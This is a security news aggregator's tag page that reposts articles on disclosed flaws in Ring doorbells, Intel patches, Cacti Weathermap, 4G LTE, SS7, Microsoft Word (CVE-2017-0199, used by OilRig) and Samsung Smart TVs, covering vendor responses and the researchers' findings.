now browsing by tag


Ring Flaw Underscores Impact of IoT Vulnerabilities

Source: National Cyber Security – Produced By Gregory Evans

A vulnerability in Amazon’s Ring doorbell cameras would have allowed a local attacker to gain access to a target’s entire wireless network.

A vulnerability in Amazon’s Ring Video Doorbell Pro IoT device could have allowed a nearby attacker to imitate a disconnected device and then sniff the credentials of the wireless networks when the owner reconfigured the device, according to a report issued by security firm Bitdefender.

The issue, which was fixed by Amazon in September, underscores the impact of a single insecure Internet-of-Things device on the organization in which it is deployed. While the vulnerability may only occur in a single network device, the result of the flaw could be leaked information — the wireless network password, for example — which  would have far more serious repercussions.

“IoT is a security disaster, any way you look at it,” says Alexandru Balan, Bitdefender’s chief security researcher. “Security is not the strong suit of IoT vendors — only rarely, do we see vendors who take security seriously.”

The discovery of a serious vulnerability in a popular IoT product comes as businesses and consumers increasingly worry about the impact that such devices may have on their own security. Only about half of security teams have a response plan in place to deal with attacks on connected devices, according to recent report from Neustar. Even critical-infrastructure firms, such as utilities that have to deal with connected operational technology, a widespread class of Internet-of-Things devices, are ill-prepared to deal with vulnerabilities and attacks, the report says.

Vulnerabilities in IoT devices can have serious repercussions. In July, a team of researchers found widespread flaws in the networking software deployed in as many as 200 million embedded devices and found millions more that could be impacted by a variant of the issue in other real-time operating systems.

The issue with Amazon Ring is not as serious but it is a reminder that vulnerabilities can still be easily found in the devices by attackers paying attention, says Balan“We tend to look at the popular devices, and those tend to have better security than the less popular devices,” 

The rest of the Ring device’s communications are encrypted and secure, according to Bitdefender. The mobile application only communicates with the device through the cloud, even if the app and device are already on the same network, the company’s analysis stated. Cloud communications are conducted over encrypted connections to API services using Transport Layer Security (TLS) and certificated pinning. 

The device’s initial connection with the local network is the only time that it sends data without encryption, Balan says. “This is a proximity based attack, so its not that big of a threat on a global scale. You need to be with a hundred meters or so to issue the deauthentication packets and force the user to reset the password.”

The existence of the vulnerability is not an indicator of the commitment of Ring’s security team, Balan adds, noting that within a few days Amazon responded and two months later closed out the report. By September, the company issued a patch — within three months after the initial communication, according to Bitdefender’s disclosure timeline. As of November, all affected devices had been patched, which Balan says is a better outcome then the majority of disclosures that Bitdefender works on with other IoT vendors.

“Amazon is one of the few that take security seriously,” he says. “Inherently everything has some flaw that will be discovered. The only challenge with IoT is whether you take that disclosure seriously.”

The trend that more vulnerabilities are being discovered in popular products is a sign that the manufacturers are paying attention and responding to researchers, Balan observes. “If someone does not have vulnerabilities disclosed in their product, then that is likely the most risky product, from a security perspective. If the vulnerabilities were discovered, then props to them — that’s a good thing.”

Related Content

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “What a Security Products Blacklist Means for End Users and Integrators.”

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline … View Full Bio

More Insights

Click here for the news story.

The post Ring Flaw Underscores Impact of IoT Vulnerabilities appeared first on National Cyber Security.

View full post on National Cyber Security

Intel asks #customers to #halt #patching for #chip #bug, citing #flaw

Source: National Cyber Security – Produced By Gregory Evans

Intel Corp (INTC.O) said on Monday that patches it released to address two high-profile security vulnerabilities in its chips are faulty, advising customers, computer makers and cloud providers to stop installing them.

Intel Executive Vice President Navin Shenoy disclosed the problem in a statement on the chipmaker’s website, saying that patches released after months of development caused computers to reboot more often than normal and other “unpredictable” behavior. 

“I apologize for any disruption this change in guidance may cause,” Shenoy said. “I assure you we are working around the clock to ensure we are addressing these issues.”

The issue of the faulty patches is separate from complaints by customers for weeks that the patches slow computer performance. Intel has said a typical home and business PC user should not see significant slowdowns.

Intel’s failure to provide a usable patch could cause businesses to postpone purchasing new computers, said IDC analyst Mario Morales.

Intel is ”still trying to get a handle on what’s really happening. They haven’t resolved the matter,” he said.

Intel asked technology providers to start testing a new version of the patches, which it began distributing on Saturday.

The warning came nearly three weeks after Intel confirmed on Jan. 3 that its chips were impacted by vulnerabilities known as Spectre and Meltdown, which make data on affected computers vulnerable to espionage.

Meltdown was specific to chips from Intel, as well as one from SoftBank Group Corp’s (9984.T) ARM Holdings. Spectre affected nearly every modern computing device, including ones with chips from Intel, ARM and Advanced Micro Devices Inc (AMD.O).

Problems with the patches have been growing since Intel on Jan. 11 said they were causing higher reboot rates in its older chips and then last week that the problem was affecting newer processors.

The post Intel asks #customers to #halt #patching for #chip #bug, citing #flaw appeared first on National Cyber Security .

View full post on National Cyber Security

Hackers #exploit old #flaw to turn #Linux #servers into #cryptocurrency miners

The malicious actors who installed and ran a cryptocurrency mining operation on hacked Tesla ASW servers and Jenkins servers is now targeting servers running Linux and has so far generated more than $74,000 in Monero.

The new campaign uses the legitimate, open-source XMRig cryptominer in conjunction with exploiting the old vulnerability CVE-2013-2618, which is found in Cacti’s Network Weathermap plug-in, according to a Trend Micro Cyber Safety Solutions Team report. The vulnerability is a cross-site scripting vulnerability in editor.php in Network Weathermap before 0.97b and allows remote attackers to inject arbitrary web script or HTML via the map_title parameter.

This active campaign is hitting targets primarily in active campaign, primarily affecting Japan, Taiwan, China, the U.S., and India.

“As to why they’re exploiting an old security flaw: Network Weathermap only has two publicly reported vulnerabilities so far, both from June 2014. It’s possible these attackers are taking advantage not only of a security flaw for which an exploit is readily available but also of patch lag that occurs in organizations that use the open-source tool” the team wrote.

Trend Micro was able to trace the activity back to two usernames associated with two Monero wallets where $74,677 has been deposited as of March 21.

Read More….


The post Hackers #exploit old #flaw to turn #Linux #servers into #cryptocurrency miners appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

Mobile #networks #investigate flaw that leaves #4G #customers open to #hacking

Source: National Cyber Security News

Security researchers have discovered a set of severe vulnerabilities in 4G LTE protocol that could be exploited to spy on user phone calls and text messages, send fake emergency alerts, spoof location of the device and even knock devices entirely offline.
A new research paper [PDF] recently published by researchers at Purdue University and the University of Iowa details 10 new cyber attacks against the 4G LTE wireless data communications technology for mobile devices and data terminals.
The attacks exploit design weaknesses in three key protocol procedures of the 4G LTE network known as attach, detach, and paging.

Unlike many previous research, these aren’t just theoretical attacks. The researchers employed a systematic model-based adversarial testing approach, which they called LTEInspector, and were able to test 8 of the 10 attacks in a real testbed using SIM cards from four large US carriers.

Authentication Synchronization Failure Attack
Traceability Attack
Numb Attack
Authentication Relay Attack
Detach/Downgrade Attack
Paging Channel Hijacking Attack
Stealthy Kicking-off Attack
Panic Attack
Energy Depletion Attack
Linkability Attack

Among the above-listed attacks, researchers consider an authentication relay attack is particularly worrying, as it lets an attacker connect to a 4G LTE network by impersonating a victim’s phone number without any legitimate credentials.

This attack could not only allow a hacker to compromise the cellular network to read incoming and outgoing messages of the victims but also frame someone else for the crime.

Read More….


View full post on National Cyber Security Ventures

White House increases #transparency around #cybersecurity flaw #disclosure

more information on sonyhack from leading cyber security expertsSource: National Cyber Security – Produced By Gregory Evans Dive Brief: The White House released the charter for the Vulnerabilities Equities Process (VEP), an interagency operation assessing whether the federal government should disclose cyber vulnerabilities it finds to vendors of a technology or whether it should “restrict” the finding in light of national security or law […] View full post on AmIHackerProof.com | Can You Be Hacked?


Source: National Cyber Security – Produced By Gregory Evans

SINCE TWO SECURITY researchers showed they could hijack a moving Jeep on a highway three years ago, both automakers and the cybersecurity industry have accepted that connected cars are as vulnerable to hacking as anything else linked to the internet. But one new car-hacking trick illustrates that while awareness helps,…

The post A DEEP FLAW IN YOUR CAR LETS HACKERS SHUT DOWN SAFETY FEATURES appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

Hackers plunder bank accounts via SS7 TFA flaw – risk known ‘for years’

Source: National Cyber Security – Produced By Gregory Evans

Hackers plunder bank accounts via SS7 TFA flaw – risk known ‘for years’

According to reports by German Newspaper Suddeutsche Zeitung, the telco said that some of its customers had money taken out of the bank accounts using a two-part attack that exploits vulnerabilities in the Signalling System 7 protocol. This is a protocol that allows telecoms companies to send text messages from one network to another. It also allows users to make …

The post Hackers plunder bank accounts via SS7 TFA flaw – risk known ‘for years’ appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

Iran-linked hackers used Microsoft Word flaw against Israeli targets, security firm says

Source: National Cyber Security – Produced By Gregory Evans

Iran-linked hackers used Microsoft Word flaw against Israeli targets, security firm says

Hackers allegedly linked to the Iranian government launched a digital espionage operation this month against more than 250 different Israel-based targets by using a recently disclosed and widely exploited Microsoft Word vulnerability, cybersecurity experts tell CyberScoop.

The hacking group, dubbed OilRig by security researchers and believed to be tied to Iranian intelligence services, utilized a software flaw in Word officially known as CVE-2017-0199 that allows attackers to execute a remote computer intrusion to take full control of a target device while leaving little or no trace, said Michael Gorelik, vice president of Israeli security firm Morphisec.

Over the last month, Morphisec has investigated the incident on behalf of multiple victims. Clients showed forensic evidence on their respective networks that could be linked back to OilRig. After its disclosure in March, CVE-2017-0199 was quickly exploited by nation-states and cybercriminals alike.

John Hultquist, ‎Director of Cyber Espionage Analysis at iSIGHT Partners, confirmed Morphisec’s findings.

“We have recently seen these actors and [other] cyber espionage actors targeting Asia adopt CVE-2017-0199. The vulnerability was a proliferation issue before it was patched, and remains one now,” said Hultquist.

OilRig has been around since at least 2015, according to numerous security industry experts who have watched the group target Israeli networks repeatedly and with varying tactics.

To exploit the Microsoft Word vulnerability, a target must open or preview an infected Microsoft Office or WordPad file, which OilRig sent out in large numbers to hundreds of Israeli-based targets, including government agencies and officials. When opened, the attachment designed by OilRig would download the Hanictor trojan, a variant of fileless malware capable of bypassing most security and anti-virus protections.

CVE-2017-0199 was patched earlier this month by Microsoft after an extraordinary nine-month delay from when it was initially communicated to the company privately. Getting the vast ecosystem of Microsoft users to patch machines is a slow and unreliable process, however, so many often remain vulnerable after a patch is published.

Point of initial contact

“The OilRig campaign is a multi-stage kill chain meant to burrow into Israeli critical defense infrastructure,” said Tom Kellermann, CEO of D.C.-based venture capital firm Strategic Cyber Ventures. Kellerman is a major investor in TrapX, another cybersecurity firm that also detected and helped clients defend against the Iranian cyberattack.

The beginnings of the Iranian operation are believed to have started with a series of phishing emails sent to Ben Gurion University employees although it quickly expanded to include various Israeli technology and medical companies. Ben Gurion University is home to Israel’s Cyber Security Research Center, a scientific institute that develops sophisticated cyber capabilities.

Gorelik said an investigation is ongoing to better understand the full scope of damage caused by the hackers. His firm, Morphisec, posted technical analysis of the attack on Thursday morning.

Investigators were able to identify a series of command and control servers activated by the hackers on April 16, which were subsequently used to launch the offensive cyber operation, according to a notification published Wednesday by Israel’s Computer Emergency Response Team. The first round of phishing emails were sent on April 19 and the last came on April 24. The malware-laden emails carried subject lines relating to nonexistent “resumes, exams and holiday plans,” said Gorelik.

Exploiting CVE-2017-0199 enables an attacker to download and execute a Visual Basic script containing PowerShell commands whenever a vulnerable user opens a document containing an embedded exploit, according to American cybersecurity firm FireEye. Malware payloads executed after the exploit can come from all manner of malware families.

FireEye previously found that various hackers — including both governments and cybercriminals — were using the same CVE-2017-0199 vulnerability to breach a wide array of different victims.

On April 11, researchers at FireEye described an attack exploiting CVE-2017-0199 this way:

A threat actor emails a Microsoft Word document to a targeted user with an embedded OLE2 embedded link object
When the user opens the document, winword.exe issues a HTTP request to a remote server to retrieve a malicious HTA file
The file returned by the server is a fake RTF file with an embedded malicious script
Winword.exe looks up the file handler for application/hta through a COM object, which causes the Microsoft HTA application (mshta.exe) to load and execute the malicious script
“This kind of vulnerability is very rare,” Gorelik said. “There has been progress from this group. This is one of the more advanced fileless campaigns I’ve seen. It was a targeted, large campaign using quite a big infrastructure. It’s fileless, so it’s very hard to detect. They regenerated signatures on the endpoint each and every time for the trojan so it’s very hard to remediate, identify or remove it.

He added, “this Iranian group is quite advanced I would say.”

The Iran-backed espionage campaign was first revealed in broad terms Wednesday through a vague press announcement issued by the Prime Minister’s Office, claiming that Israel’s newly formed Cyber Defense Authority helped to thwart the attack.

The attacks were “relatively well planned and took considerable resources. It is obvious that there was intelligence gathering prior to the attack and a careful selection of targets — in this case Israeli computing companies,” said Boaz Dolev, CEO of the Israeli security firm ClearSky in an interview with the Israeli newspaper Haaretz.


The post Iran-linked hackers used Microsoft Word flaw against Israeli targets, security firm says appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

Samsung Smart TV flaw leaves devices open to hackers

Source: National Cyber Security – Produced By Gregory Evans

Samsung Smart TV flaw leaves devices open to hackers

Your Samsung Smart TV might be pretty dumb.

Penetration testing firm Neseso has found that a 32-inch Tizen-based smart TV, first released as part of the 2015 model year and still being sold in North America, isn’t authenticating devices that connect to it via Wi-Fi Direct.

Rather than requiring a password or PIN to authenticate devices that want to connect to the TV – like, say, your smartphone when you want to use it as a remote control – it’s relying on a whitelist of devices that the user’s already authorized.

To do that, Samsung’s Smart TV uses devices’ media access control (MAC) addresses. Those are like a digital fingerprint: a MAC address is constant to a piece of hardware (though it can be spoofed, either for legitimate purposes or by a thief who wants to hide it).

Neseso says a user will be notified about a whitelist device that connects to their Smart TV, but that’s it: if the device is on a whitelist, the TV will just lay out the welcome mat without requiring any authentication.

It’s easy for an attacker to get a whitelisted MAC address, Neseso said. In fact, a few years ago, we saw a US cop sniffing out stolen gadgets by MAC addresses, wardriving in his squad car with some software he rigged up to a thumb drive sized-antenna that plugs into the car’s USB port and looking for MAC addresses that matched those listed in a database of known stolen devices.

After an attacker spoofs a known MAC address, they’d be able to access all the services on the Smart TV, such as remote control service.

An attacker would have to know, ahead of time, the MAC address of, say, your smartphone’s Wi-Fi chip. They’ll also likely have to crouch outside in your shrubbery – given that Wi-Fi Direct doesn’t work over long distances – while clutching their laptop or smartphone to spoof that MAC address and start messing with channel-changing or screen mirroring.

OK, so an attacker can change your channel. Annoying, but hardly earth-shattering, eh? Well, it doesn’t stop with the remote exploitation of channel-surfing. An attacker could use it as a springboard to gain access to whatever network the Smart TV is connected to, Neseso said.

Would an attacker be able to get at your home Wi-Fi network’s name and password? Not necessarily through this Wi-Fi Direct vulnerability. But as another security researcher revealed a few weeks ago, the operating system running on millions of Samsung products – it’s called Tizen – is what Motherboard referred to as a hacker’s dream.

Israeli researcher Amihai Neiderman:

Everything you can do wrong there, they do it. You can see that nobody with any understanding of security looked at this code or wrote it. It’s like taking an undergraduate and letting him program your software.
We’ve certainly heard of Samsung vulnerabilities before. In fact, last month, WikiLeaks published documents that purportedly showed how the CIA can monitor people through their Samsung Smart TVs.

Neseso contacted Samsung starting last month, with the Korean company eventually saying that it didn’t consider the find to be a security vulnerability. That’s why Neseso decided to publish details about it on Full Disclosure, it said.

The security outfit advised Samsung Smart TV owners to remove all their whitelisted devices and to avoid using the WiFi-Direct feature. It didn’t explain precisely how to do that, instead telling users to directly contact Samsung. You might want to poke around in the Network menu under Settings or simply disable Wi-Fi on your smart TV… though that would rob you of all those smart TV features you paid for.

Neseso didn’t test other Samsung models, but it suggested that they too might be vulnerable.

Short of disabling Wi-Fi, we’d suggest keeping an eye out for rustling shrubbery. If your TV channels start changing, call the police and then, by all means, switch off your TV’s Wi-Fi.


The post Samsung Smart TV flaw leaves devices open to hackers appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

Hackers exploited Word flaw for months while Microsoft investigated

more information on sonyhack from leading cyber security expertsSource: National Cyber Security – Produced By Gregory Evans To understand why it is so difficult to defend computers from even moderately capable hackers, consider the case of the security flaw officially known as CVE-2017-0199. The bug was unusually dangerous but of a common genre: it was in Microsoft … The post Hackers exploited Word […]

The post Hackers exploited Word flaw for months while Microsoft investigated appeared first on AmIHackerProof.com.

View full post on AmIHackerProof.com | Can You Be Hacked?